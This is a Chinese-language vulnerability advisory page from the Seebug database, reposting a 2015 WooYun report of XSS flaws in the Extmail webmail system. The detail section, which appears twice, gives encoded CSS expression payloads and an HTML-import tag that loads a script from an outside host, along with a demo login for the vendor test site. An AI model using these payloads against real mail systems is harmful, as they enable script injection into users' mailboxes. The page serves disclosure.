extmail邮件系统几个XSS跨站漏洞

基本字段

漏洞编号：: SSV-96136

披露/发现时间：: 2015-07-08

提交时间：: 2015-07-08

漏洞等级：

漏洞类别：: 其他类型

影响组件：: Extmail

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-0120858

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： extmail邮件系统是一款国内开发的开源的邮件系统，主要应用于企业、学校、政府等方面，在国内拥有较大的客户群体，该邮件系统存在xss漏洞 ### 详细说明： extmail邮件系统是一款国内开发的开源的邮件系统，主要应用于企业、学校、政府等方面，在国内拥有较大的客户群体，该邮件系统存在xss漏洞测试官方登录地址：http://**.**.**.**/extmail/cgi/index.cgi 测试帐号：demo 密码：demo 漏洞一：测试代码如下：<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 反斜杠是单的哦测试环境：win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png) 漏洞二：测试代码如下：<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境：win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png) 漏洞三：测试代码如下：<link rel=import href=http://mhz.pw/game/SOP/01.php> 测试环境：各版本Google浏览器。效果图 [<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png) ### 漏洞证明： extmail邮件系统是一款国内开发的开源的邮件系统，主要应用于企业、学校、政府等方面，在国内拥有较大的客户群体，该邮件系统存在xss漏洞测试官方登录地址：http://**.**.**.**/extmail/cgi/index.cgi 测试帐号：demo 密码：demo 漏洞一：测试代码如下：<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境：win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png) 漏洞二：测试代码如下：<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境：win7+ie8 效果图 [<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png) 漏洞三：测试代码如下：<link rel=import href=http://mhz.pw/game/SOP/01.php> 测试环境：各版本Google浏览器。效果图 [<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0120858

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

extmail邮件系统几个XSS跨站漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定